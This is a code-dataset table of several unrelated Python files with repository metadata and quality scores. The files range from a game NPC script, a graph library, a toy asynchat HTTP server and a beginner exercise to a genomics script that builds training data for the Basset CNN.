hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cfbad1f6c17648b152ae02e148a38ce075fb4e62 | 252 | py | Python | gpvdm_data/shape/Gaus/example.py | roderickmackenzie/gpvdm | 914fd2ee93e7202339853acaec1d61d59b789987 | [
"BSD-3-Clause"
] | 12 | 2016-09-13T08:58:13.000Z | 2022-01-17T07:04:52.000Z | gpvdm_core/inp_template/shape/example.py | roderickmackenzie/gpvdm | 914fd2ee93e7202339853acaec1d61d59b789987 | [
"BSD-3-Clause"
] | 3 | 2017-11-11T12:33:02.000Z | 2019-03-08T00:48:08.000Z | gpvdm_data/shape/Gaus/example.py | roderickmackenzie/gpvdm | 914fd2ee93e7202339853acaec1d61d59b789987 | [
"BSD-3-Clause"
] | 6 | 2019-01-03T06:17:12.000Z | 2022-01-01T15:59:00.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
from gpvdm_api import gpvdm_api
def run():
a=gpvdm_api(verbose=True)
a.set_save_dir(device_data)
a.edit("light.inp","#light_model","qe")
a.edit("jv0.inp","#Vstop","0.8")
a.run() | 19.384615 | 40 | 0.674603 | 46 | 252 | 3.543478 | 0.673913 | 0.147239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022321 | 0.111111 | 252 | 13 | 41 | 19.384615 | 0.705357 | 0.170635 | 0 | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
cfbb704f9aaa960b7d69d0dfa8df0111d8a29aa0 | 2,454 | py | Python | scripts/npc/make_ston.py | varenty-x/v204.1 | 804302399f100bcec713f58a89b3352f114c36f5 | [
"MIT"
] | 9 | 2021-04-26T11:59:29.000Z | 2021-12-20T13:15:27.000Z | scripts/npc/make_ston.py | varenty-x/v203.4 | 359d6575ef8256bb2d6df87bf4156c4608243232 | [
"MIT"
] | null | null | null | scripts/npc/make_ston.py | varenty-x/v203.4 | 359d6575ef8256bb2d6df87bf4156c4608243232 | [
"MIT"
] | 6 | 2021-07-14T06:32:05.000Z | 2022-02-06T02:32:56.000Z | # Eurek the Alchemist (2040050)
from net.swordie.ms.constants import JobConstants
echoDict = {
112: 1005, # Hero
122: 1005, # Paladin
132: 1005, # Dark Knight
212: 1005, # F/P
222: 1005, # I/L
232: 1005, # Bishop
312: 1005, # Bowmaster
322: 1005, # Marksman
412: 1005, # Night Lord
422: 1005, # Shadower
434: 1005, # Dual Blade
512: 1005, # Buccaneer
522: 1005, # Corsair
532: 1005, # Cannoneer
572: 1005, # Jett
1112: 10001005, # Dawn Warrior
1212: 10001005, # Blaze Wizard
1312: 10001005, # Wind Archer
1412: 10001005, # Night Walker
1512: 10001005, # Thunder Breaker
2112: 20001005, # Aran
2218: 20011005, # Evan
2312: 20021005, # Mercedes
2412: 20031005, # Phantom
2512: 20051005, # Shade
2712: 20041005, # Luminous
3112: 30011005, # Demon Slayer
3122: 30011005, # Demon Avenger
3212: 30001005, # Battle Mage
3312: 30001005, # Wild Hunter
3512: 30001005, # Mechanic
3712: 30001005, # Blaster
3612: 30021005, # Xenon
4112: 40011005, # Hayato
4212: 40021005, # Kanna
5112: 50001005, # Mihile
6112: 60001005, # Kaiser
6512: 60011005, # Angelic Buster
10112: 100001005, # Zero
14212: 140001005 # Kinesis
}
selection = sm.sendNext("Hi, how can I help you? #b\r\n"
"#L0#Receive Echo of Hero/Exclusive Spell#l")
if selection == 0:
if chr.getLevel() >= 200:
currentJob = chr.getJob()
if currentJob in echoDict:
echo = echoDict[currentJob]
if sm.hasSkill(echo):
sm.sendSayOkay("Hm...It looks like you have #s" + str(echo) + "# #q" + str(echo) + "# already.")
else:
response = sm.sendAskYesNo("Greetings, hero. Would you like to receive #s" + str(echo) + "# #q" + str(echo) + "#?")
if response:
sm.giveSkill(echo)
sm.sendSayOkay("You have learned #s" + str(echo) + "# #q" + str(echo) + "#.")
elif JobConstants.isBeastTamer(currentJob):
sm.sendSayOkay("Unfortunately, I can't offer Echo of Hero to Beast Tamers.")
else:
sm.sendSayOkay("Sorry, I can't grant the skill to those without proper qualifications. \r\n"
"Come back after finishing your job advancements.")
else:
sm.sendSayOkay("You don't have the makings of a hero. Speak to me again when you're at least Level 200.")
| 35.057143 | 131 | 0.597392 | 300 | 2,454 | 4.886667 | 0.663333 | 0.028649 | 0.016371 | 0.018417 | 0.032742 | 0.032742 | 0 | 0 | 0 | 0 | 0 | 0.242702 | 0.288101 | 2,454 | 69 | 132 | 35.565217 | 0.596451 | 0.158924 | 0 | 0.046875 | 0 | 0.015625 | 0.227498 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015625 | 0 | 0.015625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfc428f974aa00ff3dee6c7b4e66ce2e5079c59d | 1,755 | py | Python | archives/learning/bp/ch24/asynchat-example-1.py | mcxiaoke/python-labs | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | [
"Apache-2.0"
] | 7 | 2016-07-08T10:53:13.000Z | 2021-07-20T00:20:10.000Z | archives/learning/bp/ch24/asynchat-example-1.py | mcxiaoke/python-labs | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | [
"Apache-2.0"
] | 1 | 2021-05-11T05:20:18.000Z | 2021-05-11T05:20:18.000Z | archives/learning/bp/ch24/asynchat-example-1.py | mcxiaoke/python-labs | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | [
"Apache-2.0"
] | 7 | 2016-10-31T06:31:54.000Z | 2020-08-31T20:55:00.000Z | # File: asynchat-example-1.py
import asyncore, asynchat
import os, socket, string
PORT = 8000
class HTTPChannel(asynchat.async_chat):
def __init__(self, server, sock, addr):
asynchat.async_chat.__init__(self, sock)
self.set_terminator("\r\n")
self.request = None
self.data = ""
self.shutdown = 0
def collect_incoming_data(self, data):
self.data = self.data + data
def found_terminator(self):
if not self.request:
# got the request line
self.request = string.split(self.data, None, 2)
if len(self.request) != 3:
self.shutdown = 1
else:
self.push("HTTP/1.0 200 OK\r\n")
self.push("Content-type: text/html\r\n")
self.push("\r\n")
self.data = self.data + "\r\n"
self.set_terminator("\r\n\r\n") # look for end of headers
else:
# return payload.
self.push("<html><body><pre>\r\n")
self.push(self.data)
self.push("</pre></body></html>\r\n")
self.close_when_done()
class HTTPServer(asyncore.dispatcher):
def __init__(self, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind(("", port))
self.listen(5)
def handle_accept(self):
conn, addr = self.accept()
HTTPChannel(self, conn, addr)
#
# try it out
s = HTTPServer(PORT)
print "serving at port", PORT, "..."
asyncore.loop()
## GET / HTTP/1.1
## Accept: */*
## Accept-Language: en, sv
## Accept-Encoding: gzip, deflate
## User-Agent: Mozilla/4.0 (compatible; Bruce/1.0)
## Host: localhost:8000
## Connection: Keep-Alive
| 27 | 69 | 0.577778 | 228 | 1,755 | 4.320175 | 0.447368 | 0.018274 | 0.04264 | 0.048731 | 0.067005 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019763 | 0.279202 | 1,755 | 64 | 70 | 27.421875 | 0.758893 | 0.155556 | 0 | 0.05 | 0 | 0 | 0.088296 | 0.030801 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.05 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfc8ebb474939216aa62bdb9e6ffae2fd8ff8ede | 6,124 | py | Python | algolib/graphs/simple_graph.py | ref-humbold/AlgoLib_Python | 05f725504656ec93b879374a8cd87464d88fff77 | [
"Apache-2.0"
] | null | null | null | algolib/graphs/simple_graph.py | ref-humbold/AlgoLib_Python | 05f725504656ec93b879374a8cd87464d88fff77 | [
"Apache-2.0"
] | null | null | null | algolib/graphs/simple_graph.py | ref-humbold/AlgoLib_Python | 05f725504656ec93b879374a8cd87464d88fff77 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Structure of simple graph"""
from abc import ABCMeta, abstractmethod
from typing import Any, Iterable, Optional, Union
from .graph import Edge, Graph, Vertex
class _GraphRepresentation:
def __init__(self, vertex_ids=None):
self._properties = {}
if vertex_ids is not None:
self._graph_dict = {Vertex(vertex_id): set() for vertex_id in vertex_ids}
else:
self._graph_dict = {}
@property
def vertices(self):
return self._graph_dict.keys()
@property
def edges(self):
result = []
for edges_set in self._graph_dict.values():
result += edges_set
return result
@property
def edges_set(self):
return self._graph_dict.values()
def __len__(self):
return len(self._graph_dict)
def get_vertex(self, vertex_id):
try:
return next(v for v in self._graph_dict.keys() if v.id == vertex_id)
except StopIteration:
raise KeyError(f"Vertex not found : {vertex_id}") from None
def get_edge(self, source_id, destination_id):
try:
source, edges = next((v, edges) for v, edges in self._graph_dict.items()
if v.id == source_id)
return next(edge for edge in edges if edge.get_neighbour(source).id == destination_id)
except StopIteration:
raise KeyError(f"Edge not found: {source_id}, {destination_id}") from None
def get_adjacent_edges(self, vertex):
self._validate(vertex)
return self._graph_dict[vertex]
def get_property(self, item):
self._validate(item, existing_edge=True)
return self._properties.get(item, None)
def set_property(self, item, value):
self._validate(item, existing_edge=True)
self._properties[item] = value
def del_property(self, item):
self._validate(item, existing_edge=True)
del self._properties[item]
def add_vertex(self, vertex):
if vertex in self._graph_dict:
return False
self._graph_dict[vertex] = set()
return True
def add_edge_to_source(self, edge):
self._validate(edge, existing_edge=False)
self._graph_dict[edge.source].add(edge)
def add_edge_to_destination(self, edge):
self._validate(edge, existing_edge=False)
self._graph_dict[edge.destination].add(edge)
def _validate(self, item, *, existing_edge=None):
if isinstance(item, Edge):
if item.source not in self._graph_dict or item.destination not in self._graph_dict:
raise ValueError(f"Edge {item} does not belong to the graph")
if existing_edge and item not in self._graph_dict[item.source] \
and item not in self._graph_dict[item.destination]:
raise ValueError(f"Edge {item} does not belong to the graph")
elif item not in self._graph_dict:
raise ValueError(f"Vertex {item} does not belong to the graph")
class SimpleGraph(Graph, metaclass=ABCMeta):
def __init__(self, vertex_ids: Optional[Iterable[Any]]):
self._representation = _GraphRepresentation(vertex_ids)
self._properties = self._GraphPropertiesImpl(self)
@property
def properties(self):
return self._properties
@property
def vertices_count(self):
return len(self._representation)
@property
def vertices(self):
return self._representation.vertices
def get_vertex(self, vertex_id):
return self._representation.get_vertex(vertex_id)
def get_edge(self, source, destination):
return self._representation.get_edge(source.id, destination.id) \
if isinstance(source, Vertex) and isinstance(destination, Vertex) else \
self._representation.get_edge(source, destination)
def adjacent_edges(self, vertex: Vertex):
return self._representation.get_adjacent_edges(vertex)
def neighbours(self, vertex: Vertex):
return set(edge.get_neighbour(vertex)
for edge in self._representation.get_adjacent_edges(vertex))
def add_vertex(self, vertex: Union[Vertex, Any], property_: Any = None) -> Vertex:
"""Adds new vertex with given property to this graph.
:param vertex: new vertex or its identifier
:param property_: vertex property
:return: the new vertex
:raise ValueError: if the vertex exists"""
the_vertex = vertex if isinstance(vertex, Vertex) else Vertex(vertex)
was_added = self._representation.add_vertex(the_vertex)
if was_added:
if property_ is not None:
self._representation.set_property(the_vertex, property_)
return the_vertex
raise ValueError(f"Vertex {the_vertex} already exists")
def add_edge_between(self, source: Vertex, destination: Vertex, property_: Any = None):
"""Adds new edge with given property to this graph.
:param source: source vertex
:param destination: destination vertex
:param property_: edge property
:return: the new edge
:raise ValueError: if the edge exists"""
return self.add_edge(Edge(source, destination), property_)
@abstractmethod
def add_edge(self, edge: Edge, property_: Any = None):
"""Adds a new edge with given property to this graph.
:param edge: a new edge
:param property_: edge property
:return: the new edge
:raise ValueError: if the edge exists"""
class _GraphPropertiesImpl(Graph.GraphProperties):
def __init__(self, graph: "SimpleGraph"):
self._graph = graph
def __getitem__(self, item: Union["Vertex", "Edge"]) -> Any:
return self._graph._representation.get_property(item)
def __setitem__(self, item: Union["Vertex", "Edge"], value: Any):
self._graph._representation.set_property(item, value)
def __delitem__(self, item: Union["Vertex", "Edge"]):
self._graph._representation.del_property(item)
| 34.59887 | 98 | 0.652351 | 758 | 6,124 | 5.034301 | 0.131926 | 0.054245 | 0.061321 | 0.035377 | 0.349057 | 0.263103 | 0.205451 | 0.167191 | 0.138365 | 0.092243 | 0 | 0.000219 | 0.255879 | 6,124 | 176 | 99 | 34.795455 | 0.837174 | 0.101241 | 0 | 0.185841 | 0 | 0 | 0.050567 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.265487 | false | 0 | 0.026549 | 0.097345 | 0.495575 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfd3f97eb4d130eda425f8c300f730959a8cb016 | 281 | py | Python | views.py | pythonran/easy_server | 2840d76db45ac9103d2a1b7f9f044687d4f1a77e | [
"Apache-2.0"
] | null | null | null | views.py | pythonran/easy_server | 2840d76db45ac9103d2a1b7f9f044687d4f1a77e | [
"Apache-2.0"
] | null | null | null | views.py | pythonran/easy_server | 2840d76db45ac9103d2a1b7f9f044687d4f1a77e | [
"Apache-2.0"
] | null | null | null | from view_core import View
from easyserver import easyResponse
import json
class Index(View):
def get(self, request):
print request
data = {
"body": request.body,
"option": "test"
}
return easyResponse(json.dumps(data))
| 21.615385 | 45 | 0.597865 | 31 | 281 | 5.387097 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.313167 | 281 | 12 | 46 | 23.416667 | 0.865285 | 0 | 0 | 0 | 0 | 0 | 0.049822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.272727 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfda25ea8c41e2c58ebbd422c6cbddbd5774f03e | 311 | py | Python | Deployment/extract_chorus.py | Parvez13/Predicting-Hit-Songs-Using-Repeated-Chorus | 00ef57c05c729ee43a6ad7ad6276f1a403452f2d | [
"MIT"
] | null | null | null | Deployment/extract_chorus.py | Parvez13/Predicting-Hit-Songs-Using-Repeated-Chorus | 00ef57c05c729ee43a6ad7ad6276f1a403452f2d | [
"MIT"
] | null | null | null | Deployment/extract_chorus.py | Parvez13/Predicting-Hit-Songs-Using-Repeated-Chorus | 00ef57c05c729ee43a6ad7ad6276f1a403452f2d | [
"MIT"
] | null | null | null | from pychorus import find_and_output_chorus
def extract_song_chorus(path, main):
# songname = path.split('/',2)[0].split('.')[0]
Newpath = main + '/' + "song_to_predict"+'.wav'
chorus = find_and_output_chorus(path, Newpath, 15)
if chorus == None:
return None
else:
return Newpath
| 19.4375 | 52 | 0.655949 | 42 | 311 | 4.619048 | 0.595238 | 0.072165 | 0.134021 | 0.195876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020161 | 0.202572 | 311 | 15 | 53 | 20.733333 | 0.762097 | 0.144695 | 0 | 0 | 0 | 0 | 0.080645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfdc5fe206c24d67d093476b18ea47335843481f | 806 | py | Python | aula7/exercicio/exercicio2.py | diegocolombo1989/Trabalho-Python | 4603117bebfb6e801c3289e108b4e8f29442ab6f | [
"MIT"
] | null | null | null | aula7/exercicio/exercicio2.py | diegocolombo1989/Trabalho-Python | 4603117bebfb6e801c3289e108b4e8f29442ab6f | [
"MIT"
] | null | null | null | aula7/exercicio/exercicio2.py | diegocolombo1989/Trabalho-Python | 4603117bebfb6e801c3289e108b4e8f29442ab6f | [
"MIT"
] | null | null | null | #--- Exercício 2 - Dicionários
#--- Escreva um programa que leia os dados de 11 jogadores
#--- Jogador: Nome, Posicao, Numero, PernaBoa
#--- Crie um dicionario para armazenar os dados
#--- Imprima todos os jogadores e seus dados
#--- Resolução Nicole Gruber
lista_jogadores=[]
for i in range(1,3):
Nome=input('Digite o nome do jogador: ')
Posicao=input('Digite a posiçao do jogador: ')
Numero=input('Digite o numero do jogador: ')
PernaBoa=input('Digite a Perna Boa do jogador: ')
dicionario = {'Nome': Nome, 'Posicao': Posicao, 'Numero': Numero, 'PernaBoa': PernaBoa}
lista_jogadores.append(dicionario)
for dicionario in lista_jogadores:
print(f"Nome={dicionario['Nome']}, Posiçao={dicionario['Posicao']}, Numero={dicionario['Numero']}, PernaBoa {dicionario['PernaBoa']}") | 38.380952 | 138 | 0.702233 | 104 | 806 | 5.413462 | 0.451923 | 0.078153 | 0.042629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007331 | 0.153846 | 806 | 21 | 138 | 38.380952 | 0.818182 | 0.305211 | 0 | 0 | 0 | 0.1 | 0.473874 | 0.201802 | 0 | 0 | 0 | 0.047619 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfde219f134665c1545cb687c39a9a1a9fe75755 | 5,561 | py | Python | Step02_Build_CNN_model/makeFiles4Basset.py | talkowski-lab/SMC_CNN_Model | 19eee4eac060e5dea72387335bc960693941b703 | [
"MIT"
] | 1 | 2021-06-12T00:56:22.000Z | 2021-06-12T00:56:22.000Z | Step02_Build_CNN_model/makeFiles4Basset.py | talkowski-lab/SMC_CNN_Model | 19eee4eac060e5dea72387335bc960693941b703 | [
"MIT"
] | null | null | null | Step02_Build_CNN_model/makeFiles4Basset.py | talkowski-lab/SMC_CNN_Model | 19eee4eac060e5dea72387335bc960693941b703 | [
"MIT"
] | 1 | 2021-11-08T22:05:05.000Z | 2021-11-08T22:05:05.000Z | #!/usr/bin/env python
from __future__ import division
import numpy.random as npr
import pysam
from Bio.Seq import reverse_complement
BASSET_FOLDER = ""
def makeBed(a,cl,inside=25,outside=75,reg=2):
d=[]
genome = pysam.Fastafile("../Input_data/GRCh37.fa")
with open(a,"r") as f:
d0=f.readlines()
for x in d0:
t=x.strip()
ch=t.split("@")[2].split(":")[0]
st=t.split("@")[2].split(":")[1]
end0 =int(t.split("@")[2].split(":")[2].split("^")[0])-1
start =int(t.split("@")[2].split("^")[1].split("&")[0])
end =int(t.split("@")[2].split("&")[1].split("^")[0])-1
start1=int(t.split("@")[2].split("|")[0].split("^")[-1])
s0 = end0-inside
e0 = end0+outside
s1 = start-outside
e1 = start+inside
s2 = end-inside
e2 = end+outside
s3 = start1-outside
e3 = start1+inside
bedname=t+"::"+cl
seq0=genome.fetch(ch,s0,e0) if st =="+" else reverse_complement(genome.fetch(ch,s0,e0))
seq1=genome.fetch(ch,s1,e1) if st =="+" else reverse_complement(genome.fetch(ch,s1,e1))
seq2=genome.fetch(ch,s2,e2) if st =="+" else reverse_complement(genome.fetch(ch,s2,e2))
seq3=genome.fetch(ch,s3,e3) if st =="+" else reverse_complement(genome.fetch(ch,s3,e3))
if reg==4:
if st=="+":
d.append(bedname+"\t"+seq0+seq1+seq2+seq3)
else:
d.append(bedname+"\t"+seq3+seq2+seq1+seq0)
elif reg==2:
if st=="+":
d.append(bedname+"\t"+seq1+seq2)
else:
d.append(bedname+"\t"+seq2+seq1)
print "Sequences extracted."
return d
def makeBassetPre(a,limit,pre):
dic={}
sz=[]
cl=[]
n=0
k=0
for d in a:
sz.append(len(d))
for i in d:
t=i.strip().split("\t")
spliceID,target=t[0].split("::")
if (target in cl)==False:
cl.append(target)
header=spliceID+"::"+target
seq=t[1]
dic[n]={"name":header,"seq":seq,"class":["0"]*len(a)}
dic[n]["class"][k]="1"
n+=1
k+=1
print "Sub-dictionary built."
print "All dictionary built:",len(dic),"entries."
train=[]
valid=[]
test =[]
remain=[]
ini=0
for x in sz:
if x <= limit:
npr.seed(122)
rnd=npr.choice(xrange(ini,ini+x),x,replace=False)
valid+=list(rnd[-int(round(x/5)):])
test+=list(rnd[:-int(round(x/5))][-int(round(x*0.1)):])
train+=list(rnd[:-int(round(x/5))][:-int(round(x*0.1))])
ini+=x
else:
x0=limit
npr.seed(122)
rnd0=npr.choice(xrange(ini,ini+x),x,replace=False)
rnd=rnd0[:x0]
valid+=list(rnd[-int(round(x0/5)):])
test+=list(rnd[:-int(round(x0/5))][-int(round(x0*0.1)):])
train+=list(rnd[:-int(round(x0/5))][:-int(round(x0*0.1))])
remain+=list(rnd0[x0:])
ini+=x
npr.seed(122)
train=npr.permutation(train)
npr.seed(122)
valid=npr.permutation(valid)
npr.seed(122)
test=npr.permutation(test)
npr.seed(122)
remain=npr.permutation(remain)
all=list(train)+list(valid)+list(test)
lft=list(remain)
print "Data separated:"
print "Training:",len(train)
print "Validation:",len(valid)
print "Test:",len(test)
print "Left:",len(lft)
#write act and fa file for Basset H5 generation
print "Writing to output..."
f1=open(pre+".fa","w")
f2=open(pre+"_act.txt","w")
f2.write("\t"+"\t".join(cl)+"\n")
for x in all:
f1.write(">"+dic[x]["name"]+"\n")
f1.write(dic[x]["seq"]+"\n")
f2.write(dic[x]["name"]+"\t"+"\t".join(dic[x]["class"])+"\n")
f1.close()
f2.close()
f3=open(pre+"_dataSplit.txt","w")
f3.write("Train:"+"\t"+str(len(train))+"\n")
f3.write("Valid:"+"\t"+str(len(valid))+"\n")
f3.write("Test:"+"\t"+str(len(test))+"\n")
f3.close()
f4=open(pre+"_left.4Test.fa","w")
f5=open(pre+"_left.names.txt","w")
for x in lft:
f4.write(">"+dic[x]["name"]+"\n")
f4.write(dic[x]["seq"]+"\n")
f5.write(dic[x]["name"]+"\n")
f4.close()
f5.close()
f6=open(pre+"_test0.4Test.fa","w")
f7=open(pre+"_test0.names.txt","w")
for x in test:
f6.write(">"+dic[x]["name"]+"\n")
f7.write(dic[x]["name"]+"\n")
f6.write(dic[x]["seq"]+"\n")
f6.close()
f7.close()
print "Making H5 file for Basset..."
cmd= BASSET_FOLDER + "/src/seq_hdf5.py -c -v " + str(len(valid)) + " -t " + str(len(test)) + " " + pre + ".fa " + pre + "_act.txt " + pre + "_learn.h5"
sta,out=commands.getstatusoutput(cmd)
print out
#cmd="/data/talkowski/dg520/projects/Basset/src/seq_hdf5.py -c -t " + str(len(remain)) + " " + pre + ".fa " + pre + "_act.txt " + pre + "_testRemain.h5"
#sta,out=commands.getstatusoutput(cmd)
#print out
return 1
def doit(a,maxi,piece,outp):
p=[]
for x in a:
p.append(makeBed(x[0],x[1],inside=25,outside=75,reg=piece))
makeBassetPre(p,maxi,outp)
return 1
#Main
doit([("../Output_data/up01tripletNames_pos_fdr01.txt","Inclusion"),
("../Output_data/dn01tripletNames_pos_fdr01.txt","Exclusion"),
("../Output_data/nc01tripletNames_all_382.txt","Stable")],
700,
4,
"../Output_data/3C")
